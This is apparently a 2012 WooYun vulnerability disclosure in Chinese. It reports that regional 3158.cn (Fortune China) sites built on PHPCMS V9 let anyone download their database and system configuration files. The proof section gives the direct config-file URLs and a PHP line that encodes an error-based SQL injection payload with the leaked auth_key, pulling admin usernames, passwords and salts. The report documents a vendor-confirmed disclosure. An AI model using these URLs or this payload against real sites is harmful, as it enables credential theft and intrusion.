漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-014124
漏洞标题:财富中国多分站任意文件下载及引起的注入
相关厂商:财富中国
漏洞作者: kobin97
提交时间:2012-10-31 13:57
修复时间:2012-12-15 13:58
公开时间:2012-12-15 13:58
漏洞类型:任意文件遍历/下载
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-10-31: 细节已通知厂商并且等待厂商处理中
2012-10-31: 厂商已经确认,细节仅向厂商公开
2012-11-10: 细节向核心白帽子及相关领域专家公开
2012-11-20: 细节向普通白帽子公开
2012-11-30: 细节向实习白帽子公开
2012-12-15: 细节向公众公开
简要描述:
财富中国某些分站任意文件下载及引起的注入
详细说明:
财富中国 cn 域所有使用V9的站点,由于配置不当,造成配置文件下载,从而造成信息泄漏及SQL注入等问题。
站点大概有:
zx.sichuan.3158.cn
zx.hlj.3158.cn
zx.henan.3158.cn
zx.ln.3158.cn
zx.guangzhou.3158.cn
zx.jiangsu.3158.cn
等
http://zx.hlj.3158.cn/caches/configs/database.php
http://zx.hlj.3158.cn/caches/configs/system.php
直接下载
得知 auth_key 后,可以造成多处SQL注入。
漏洞证明:
die(sys_auth(sys_auth("1' and (select 1 from(select count(*),concat(0x7c,(select concat(username,0x7c,password,0x7c,encrypt) from v9_sso_admin limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#\tp",'ENCODE',$auth_key )));
修复方案:
配置
版权声明:转载请注明来源 kobin97@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-10-31 14:44
厂商回复:
已确认,感谢!
最新状态:
暂无
( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)